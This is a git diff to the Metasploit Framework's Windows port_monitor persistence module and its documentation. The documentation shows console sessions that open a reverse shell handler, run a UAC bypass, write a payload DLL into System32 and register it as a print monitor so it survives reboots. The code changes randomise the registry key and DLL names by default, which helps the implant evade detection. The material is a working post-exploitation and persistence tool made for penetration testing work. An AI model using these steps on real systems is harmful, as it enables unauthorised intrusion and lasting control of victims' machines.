diff --git a/documentation/modules/exploit/windows/persistence/port_monitor.md b/documentation/modules/exploit/windows/persistence/port_monitor.md index 6e40ba967c951..d6d75731867f4 100644 --- a/documentation/modules/exploit/windows/persistence/port_monitor.md +++ b/documentation/modules/exploit/windows/persistence/port_monitor.md @@ -34,16 +34,17 @@ Since this requires writing to **System32** and modifying **HKLM**, **administra ### MONITOR_NAME -Name of the registry key created under: +Name of the registry key created under: `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors` -(Default: `Hadess`) +(Default: randomized 8-character alpha string) ### DLL_NAME -Name of the payload DLL written to: `%WINDIR%\\System32` +Name of the payload DLL written to: `%WINDIR%\System32`. The `.dll` extension is +appended automatically if not supplied. -(Default: `persist.dll`) +(Default: randomized 8-character alpha string) ### RESTART_SPOOLER @@ -53,7 +54,9 @@ Restart the Print Spooler service after installation to trigger the payload imme ## Scenarios -### Initial System Session +### Windows + +#### Initial System Session ```msf exploit(windows/persistence/port_monitor) > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp @@ -76,90 +79,7 @@ msf exploit(multi/handler) > run meterpreter > background [*] Backgrounding session 1... -msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester -msf post(multi/recon/local_exploit_suggester) > set SESSION 1 -SESSION => 1 -msf post(multi/recon/local_exploit_suggester) > run -[*] 172.21.176.1 - Collecting local exploits for x64/windows... -[*] 172.21.176.1 - 243 exploit checks are being tried... -[+] 172.21.176.1 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. -[+] 172.21.176.1 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable. -[+] 172.21.176.1 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. -[+] 172.21.176.1 - exploit/windows/persistence/registry: The target is vulnerable. Registry writable -[+] 172.21.176.1 - exploit/windows/persistence/registry_userinit: The target is vulnerable. Registry likely exploitable -[+] 172.21.176.1 - exploit/windows/persistence/startup_folder: The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup -[*] Running check method for exploit 63 / 63 -[*] 172.21.176.1 - Valid modules for session 1: -============================ - - # Name Potentially Vulnerable? Check Result - - ---- ----------------------- ------------ - 1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable. - 2 exploit/windows/local/bypassuac_fodhelper Yes The target appears to be vulnerable. - 3 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable. - 4 exploit/windows/persistence/registry Yes The target is vulnerable. Registry writable - 5 exploit/windows/persistence/registry_userinit Yes The target is vulnerable. Registry likely exploitable - 6 exploit/windows/persistence/startup_folder Yes The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\DELL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup - 7 exploit/multi/persistence/ssh_key No The target is not exploitable. sshd_config file not found - 8 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable. - 9 exploit/windows/local/always_install_elevated No The target is not exploitable. - 10 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable. - 11 exploit/windows/local/bypassuac_comhijack No The target is not exploitable. - 12 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable. - 13 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable. - 14 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found - 15 exploit/windows/local/capcom_sys_exec No The target is not exploitable. Target contains a block list which prevents the vulnerable driver from being loaded! - 16 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable. - 17 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows! - 18 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable. - 19 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable. - 20 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 6.2.26100.7705 - 21 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable. - 22 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable. - 23 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version! - 24 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable. - 25 exploit/windows/local/cve_2021_40449 No The target is not exploitable. Target is not running a vulnerable version of Windows! - 26 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable. - 27 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable. - 28 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable. - 29 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2 - 30 exploit/windows/local/cve_2023_28252_clfs_driver No The target is not exploitable. - 31 exploit/windows/local/cve_2024_30085_cloud_files No The target is not exploitable. - 32 exploit/windows/local/cve_2024_30088_authz_basep No The target is not exploitable. Version detected: Windows 10+ Build 26200. Revision number detected: 7840. - 33 exploit/windows/local/cve_2024_35250_ks_driver No The target is not exploitable. Version detected: Windows 10+ Build 26200 - 34 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found - 35 exploit/windows/local/ikeext_service No The check raised an exception. - 36 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store - 37 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 11 24H2+ (10.0 Build 26200). is not vulnerable - 38 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability. - 39 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable. - 40 exploit/windows/local/ms15_078_atmfd_bof No The target is not exploitable. - 41 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable. - 42 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception. - 43 exploit/windows/local/ms16_075_reflection No The target is not exploitable. - 44 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable. - 45 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception. - 46 exploit/windows/local/nvidia_nvsvc No The check raised an exception. - 47 exploit/windows/local/panda_psevents No The target is not exploitable. - 48 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found - 49 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012. - 50 exploit/windows/local/tokenmagic No The target is not exploitable. - 51 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable. - 52 exploit/windows/local/webexec No The check raised an exception. - 53 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable. - 54 exploit/windows/persistence/accessibility_features_debugger No The target is not exploitable. You have admin rights to run this Module - 55 exploit/windows/persistence/assistive_technology No The target is not exploitable. You have admin rights to run this Module - 56 exploit/windows/persistence/notepadpp_plugin No The target is not exploitable. Notepad++ is probably not present - 57 exploit/windows/persistence/port_monitor No The target is not exploitable. Admin or SYSTEM privileges are required - 58 exploit/windows/persistence/service No The target is not exploitable. You must be System/Admin to run this Module - 59 exploit/windows/persistence/task_scheduler No The target is not exploitable. You need higher privileges to create scheduled tasks - 60 exploit/windows/persistence/wmi/wmi_event_subscription_event_log No The target is not exploitable. This module requires powershell to run - 61 exploit/windows/persistence/wmi/wmi_event_subscription_interval No The target is not exploitable. This module requires powershell to run - 62 exploit/windows/persistence/wmi/wmi_event_subscription_process No The target is not exploitable. This module requires powershell to run - 63 exploit/windows/persistence/wmi/wmi_event_subscription_uptime No The target is not exploitable. This module requires powershell to run - -[*] Post module execution completed -msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_fodhelper +msf exploit(multi/handler) > use exploit/windows/local/bypassuac_fodhelper [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf exploit(windows/local/bypassuac_fodhelper) > set SESSION 1 SESSION => 1 @@ -208,7 +128,7 @@ meterpreter > background -### Install Persistence +#### Install Persistence ```msf exploit(windows/local/bypassuac_fodhelper) > use exploit/windows/persistence/port_monitor [*] Using configured payload windows/meterpreter/reverse_tcp @@ -220,9 +140,9 @@ Module options (exploit/windows/persistence/port_monitor): Name Current Setting Required Description ---- --------------- -------- ----------- - DLL_NAME persist.dll no DLL filename to write in %WINDIR%\S + DLL_NAME persist.dll yes DLL filename to write in %WINDIR%\S ystem32. - MONITOR_NAME Hadess no Name of the print monitor registry + MONITOR_NAME Hadess yes Name of the print monitor registry key to create. RESTART_SPOOLER false yes Restart the Print Spooler service t o trigger monitor loading immediate @@ -299,7 +219,12 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Hadess - Driver REG_SZ persist.dll + Driver REG_SZ persist.dll ``` + + diff --git a/modules/exploits/windows/persistence/port_monitor.rb b/modules/exploits/windows/persistence/port_monitor.rb index c212704c57016..5b9e32d00c848 100644 --- a/modules/exploits/windows/persistence/port_monitor.rb +++ b/modules/exploits/windows/persistence/port_monitor.rb @@ -31,13 +31,9 @@ def initialize(info = {}) }, 'License' => MSF_LICENSE, 'Author' => ['Nayera'], - 'DefaultOptions' => { - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', - 'DisablePayloadHandler' => true - }, - 'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64], + 'Arch' => [ARCH_X64, ARCH_X86], 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter', 'shell' ], + 'SessionTypes' => [ 'meterpreter' ], 'Privileged' => true, 'Targets' => [ [ 'Automatic', {} ] @@ -60,8 +56,8 @@ def initialize(info = {}) register_options( [ - OptString.new('MONITOR_NAME', [false, 'Name of the print monitor registry key to create.', 'Hadess']), - OptString.new('DLL_NAME', [false, 'DLL filename to write in %WINDIR%\\System32.', 'persist.dll']), + OptString.new('MONITOR_NAME', [true, 'Name of the print monitor registry key to create.', Rex::Text.rand_text_alpha(8)]), + OptString.new('DLL_NAME', [true, 'DLL filename to write in %WINDIR%\\System32.', Rex::Text.rand_text_alpha(8)]), OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger monitor loading immediately.', true]) ] ) @@ -76,7 +72,8 @@ def system32_path end def payload_name - datastore['DLL_NAME'] + name = datastore['DLL_NAME'].to_s + name.downcase.end_with?('.dll') ? name : "#{name}.dll" end def payload_path @@ -105,7 +102,6 @@ def check def install_persistence fail_with(Failure::NoAccess, 'Admin or SYSTEM privileges are required') unless is_admin? || is_system? - fail_with(Failure::BadConfig, 'DLL_NAME must end in .dll') unless payload_name.downcase.end_with?('.dll') fail_with(Failure::BadConfig, 'DLL_NAME must not contain path separators') if payload_name.match?(%r{[\\/]}) fail_with(Failure::BadConfig, 'MONITOR_NAME cannot be empty') if datastore['MONITOR_NAME'].strip.empty?